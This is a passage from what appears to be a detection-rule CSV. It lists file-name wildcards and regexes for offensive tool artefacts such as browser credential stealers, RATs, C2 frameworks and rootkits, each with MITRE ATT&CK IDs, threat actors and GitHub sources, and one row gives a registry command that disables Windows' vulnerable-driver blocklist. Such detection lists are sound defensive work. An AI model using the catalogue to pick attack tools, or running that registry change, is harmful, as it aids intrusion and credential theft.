Sandworm","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","19126"
"*\Stealer.exe*",".{0,1000}\\Stealer\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19127"
"*\Stealer.exe*",".{0,1000}\\Stealer\.exe.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","19128"
"*\Stealer.exe*",".{0,1000}\\Stealer\.exe.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","19129"
"*\Stealer.sln*",".{0,1000}\\Stealer\.sln.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","19130"
"*\Stealer\modules\Passwords.cs*",".{0,1000}\\Stealer\\modules\\Passwords\.cs.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","19131"
"*\Stealer\Stealer\modules\*",".{0,1000}\\Stealer\\Stealer\\modules\\.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","19132"
"*\Stealing.cpp*",".{0,1000}\\Stealing\.cpp.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","19133"
"*\StealTokenClient.exe*",".{0,1000}\\StealTokenClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","19134"
"*\StealTokenDrv.cpp*",".{0,1000}\\StealTokenDrv\.cpp.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","19135"
"*\StealTokenDrv.exe*",".{0,1000}\\StealTokenDrv\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","19136"
"*\stickykey.ps1*",".{0,1000}\\stickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","19137"
"*\Stickykeys.sh*",".{0,1000}\\Stickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","19138"
"*\StickyNotesExtract.exe*",".{0,1000}\\StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19139"
"*\StickyNotesExtract.exe*",".{0,1000}\\StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19140"
"*\StickyNotesExtract.exe*",".{0,1000}\\StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19141"
"*\stolen_cookies.txt*",".{0,1000}\\stolen_cookies\.txt.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","19142"
"*\StolenPasswords.txt*",".{0,1000}\\StolenPasswords\.txt.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","19143"
"*\Stompy.ps1*",".{0,1000}\\Stompy\.ps1.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","19144"
"*\StomPY.py*",".{0,1000}\\StomPY\.py.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","19145"
"*\Stompy-main\*",".{0,1000}\\Stompy\-main\\.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","19146"
"*\stop_outlook.py*",".{0,1000}\\stop_outlook\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19147"
"*\stop_outlook.txt*",".{0,1000}\\stop_outlook\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19148"
"*\StopProcessCommand.cs",".{0,1000}\\StopProcessCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19149"
"*\StormRat.exe*",".{0,1000}\\StormRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19151"
"*\Stowaway\admin\*",".{0,1000}\\Stowaway\\admin\\.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19152"
"*\Stowaway\agent\*",".{0,1000}\\Stowaway\\agent\\.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19153"
"*\Stowaway\ansicon\*",".{0,1000}\\Stowaway\\ansicon\\.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19154"
"*\subbrute.py*",".{0,1000}\\subbrute\.py.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","19159"
"*\Suborner.sln*",".{0,1000}\\Suborner\.sln.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","0","N/A","N/A","9","5","469","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z","19160"
"*\suncrypt.html*",".{0,1000}\\suncrypt\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19161"
"*\sunder.exe*",".{0,1000}\\sunder\.exe.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","N/A","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","19162"
"*\Suntour.ps1*",".{0,1000}\\Suntour\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","19163"
"*\Supernova.exe*",".{0,1000}\\Supernova\.exe.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","19167"
"*\SuperPuTTY.csv*",".{0,1000}\\SuperPuTTY\.csv.{0,1000}","offensive_tool_keyword","SessionGopher","uses WMI to extract saved session information for remote access tools such as WinSCP - PuTTY - SuperPuTTY - FileZilla and Microsoft Remote Desktop. It can be run remotely or locally.","T1047 - T1003.008 - T1552.004 - T1555.003","TA0006","N/A","PYSA - DarkSide - Sphinx","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","0","N/A","N/A","10","10","1255","173","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z","19168"
"*\Supershell.tar.gz*",".{0,1000}\\Supershell\.tar\.gz.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","19169"
"*\Supershell\rssh\pkg\*",".{0,1000}\\Supershell\\rssh\\pkg\\.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","19170"
"*\Supershell\rssh\pkg\*",".{0,1000}\\Supershell\\rssh\\pkg\\.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","19171"
"*\Suprise\Suprise.exe*",".{0,1000}\\Suprise\\Suprise\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19180"
"*\SurveyFile_x64_Release.exe*",".{0,1000}\\SurveyFile_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19181"
"*\SurveyRegistry_x64_Release.exe*",".{0,1000}\\SurveyRegistry_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","19182"
"*\svchost_console.exe*",".{0,1000}\\svchost_console\.exe.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","19183"
"*\SwampThing.csproj*","SwampThing\.csproj","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","19184"
"*\SweetPotato.dll*",".{0,1000}\\SweetPotato\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","19185"
"*\SweetPotato.dll*",".{0,1000}\\SweetPotato\.dll.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19186"
"*\SweetPotato.exe*",".{0,1000}\\SweetPotato\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19187"
"*\SweetPotato.exe*",".{0,1000}\\SweetPotato\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19188"
"*\Sweetpotato.exe*",".{0,1000}\\Sweetpotato\.exe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","19189"
"*\SweetPotato\Program.cs*",".{0,1000}\\SweetPotato\\Program\.cs.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","19190"
"*\SweetPotato-master.zip*",".{0,1000}\\SweetPotato\-master\.zip.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","19191"
"*\SwitchPriv.exe*",".{0,1000}\\SwitchPriv\.exe.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19192"
"*\SwitchPriv.sln*",".{0,1000}\\SwitchPriv\.sln.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19193"
"*\swodniW\:C*",".{0,1000}\\swodniW\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","19194"
"*\sysDb-dmp*",".{0,1000}\\sysDb\-dmp.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","19196"
"*\SYSTEM\CurrentControlSet\Control\CI\Config\ -Name VulnerableDriverBlocklistEnable 0*",".{0,1000}\\SYSTEM\\CurrentControlSet\\Control\\CI\\Config\\\s\-Name\sVulnerableDriverBlocklistEnable\s0.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#registry","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","19197"
"*\system32\msf.sys*",".{0,1000}\\system32\\msf\.sys.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","19201"
"*\systemic.txt",".{0,1000}\\systemic\.txt","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/BOF-RegSave","1","0","N/A","N/A","10","10","198","32","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z","19204"
"*\SysWhispersU.exe*",".{0,1000}\\SysWhispersU\.exe.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","19205"
"*\TakeMyRDP*",".{0,1000}\\TakeMyRDP.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","0","N/A","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","19221"
